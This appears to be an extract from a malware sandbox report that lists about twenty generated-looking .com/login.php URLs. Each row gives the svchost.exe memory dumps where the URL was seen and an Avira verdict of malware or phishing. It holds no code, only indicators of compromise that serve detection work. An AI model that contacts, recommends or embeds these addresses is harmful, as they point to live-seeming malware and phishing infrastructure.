http://qedyruv.com/login.php	svchost.exe, 00000002.00000003.2357365639.00000000087B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353785619.000000000878B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760246399.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2354372156.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2752503084.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2752639627.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352296383.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744373638.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353676961.000000000878B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2748851196.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2749199124.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2759913760.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352873601.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2359453590.000000000878B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352880774.000000000878B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://pumyxiv.com/login.php	svchost.exe, 00000002.00000003.2432573037.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2391261344.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3283281392.0000000008784000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2153845839.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2157288878.0000000003353000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2396706488.00000000086F3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2157020892.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2397272204.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2151605214.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2395827509.00000000086EE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404121983.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2394995795.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2194320231.0000000003353000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202674715.0000000003353000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2152199201.000000000338F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2152200523.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3341799100.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2151945828.0000000003353000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2157370436.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3266427470.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432700162.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://volycem.com/login.php	svchost.exe, 00000002.00000003.2357365639.00000000087B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352296383.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353331404.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352299692.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2745079929.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353878040.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352873601.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352879533.00000000086FE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://puzyduq.com/login.php	svchost.exe, 00000002.00000003.2671509523.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2763334143.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760246399.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3403450959.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3265760525.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2752639627.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2771121340.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744373638.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350325354.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670315739.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670012329.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2671936852.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2748851196.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353331404.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349262173.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2749199124.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350047450.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2759913760.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352299692.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2801740808.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2787365873.00000000086F9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://pufyxov.com/login.phpcom/login.php	svchost.exe, 00000002.00000003.2672088553.0000000008785000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://puzydal.com/login.php	svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2550145927.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2308037835.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296551987.0000000008691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296517767.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549686862.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548641598.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558367053.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2302432052.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547272194.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2305095010.0000000008701000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2295479426.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296451736.0000000008702000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://lyxysad.com/login.php	svchost.exe, 00000002.00000003.2357365639.00000000087B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2359008557.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2354372156.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2752503084.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352296383.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353331404.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352299692.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2745079929.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353878040.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352873601.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2738837414.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352879533.00000000086FE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://gahyzez.com/login.php	svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303334009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2552314103.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2307697997.0000000003394000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2301364243.00000000033D8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://purywyl.com/login.php	svchost.exe, 00000002.00000003.2671509523.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2763334143.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760246399.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3403450959.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349866379.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3265760525.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2752639627.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349127281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2771121340.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744373638.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350325354.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670315739.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670012329.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2748851196.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349262173.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2749199124.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350047450.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2759913760.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2801740808.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2787365873.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2738516422.00000000086F0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://puryxag.com/login.php	svchost.exe, 00000002.00000003.2334859023.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334498126.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2592000281.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339275288.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334047161.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337099007.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337179930.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332145984.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2610522908.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337298832.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2336690325.0000000008692000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334800958.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2338959183.00000000086F6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://vopymyc.com/login.php	svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2573770543.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582641786.0000000003393000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323670952.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2578065233.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321666596.00000000033D8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://vojycec.com/login.php	svchost.exe, 00000002.00000003.2671509523.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349866379.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349127281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350325354.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2671936852.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349262173.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350047450.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://gatyfus.com/login.php	svchost.exe, 00000002.00000003.2432573037.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2408310468.0000000008692000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3268596550.0000000008643000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2153845839.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2157288878.0000000003353000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2396706488.00000000086F3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2408240997.0000000008690000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2157020892.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2397272204.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2151605214.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2395827509.00000000086EE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2394995795.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2152200523.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3284179552.0000000008644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2151945828.0000000003353000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2157370436.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3266427470.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432700162.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2408435581.0000000008706000.00000004.00000020.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000006.00000002.2554600445.00000000015E8000.00000004.00000020.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000006.00000002.2554600445.000000000165E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://pufybyv.com/login.php	svchost.exe, 00000002.00000003.2194039895.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432573037.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557475743.0000000008785000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3344516796.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3403579535.000000000870D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577719348.0000000008784000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404003407.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548810720.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2434123780.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3402591277.0000000008693000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2578793071.0000000008786000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432700162.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://lyvyjox.com/login.php	svchost.exe, 00000002.00000003.2534942140.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2799665980.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2580138663.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2503287920.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2639783827.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513891995.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577725092.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744282585.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2502622128.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3281377881.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3402132488.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2501199142.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2781606589.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2681961070.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2812761855.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746922918.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2508227965.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2281429661.000000000861B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2606611423.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2645351612.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2280606997.0000000000882000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://qegytyv.com/login.php	svchost.exe, 00000002.00000003.2763334143.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2553968961.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760246399.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2592000281.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2552314103.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3403450959.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557483842.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3265760525.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2752639627.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2771121340.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744373638.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670315739.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670012329.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2748851196.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2749199124.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582447207.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2759913760.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549395486.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2573770543.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2801740808.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2787365873.00000000086F9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ganyfes.com/login.php	svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303334009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2553968961.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2552314103.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557483842.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2298951843.00000000086D4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2556984027.00000000086F6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://volydot.com/login.php	svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2550145927.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2308037835.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296732942.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296551987.0000000008691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296517767.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549686862.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548641598.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558367053.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549395486.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2302432052.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547272194.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2305095010.0000000008701000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548645821.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2295479426.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296451736.0000000008702000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://galyquw.com/login.php	svchost.exe, 00000002.00000003.2671509523.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2588418708.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582588416.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332552292.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2628718282.00000000087AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326892101.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582447207.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328002527.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635696281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326381294.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347564818.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2580751870.00000000087AC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2581725706.0000000008785000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326465693.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2638579923.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://lykyvod.com/login.php	svchost.exe, 00000002.00000003.2550145927.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549686862.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548641598.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549395486.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296776136.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547272194.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548645821.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547272194.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548641598.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296803931.00000000086F4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://pujydap.com/login.php	svchost.exe, 00000002.00000003.2796055638.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3283281392.0000000008784000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2799131678.0000000003393000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3393093066.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3267123963.0000000003347000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2798176179.00000000058CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2800821291.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404003407.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2793841550.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2384104652.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
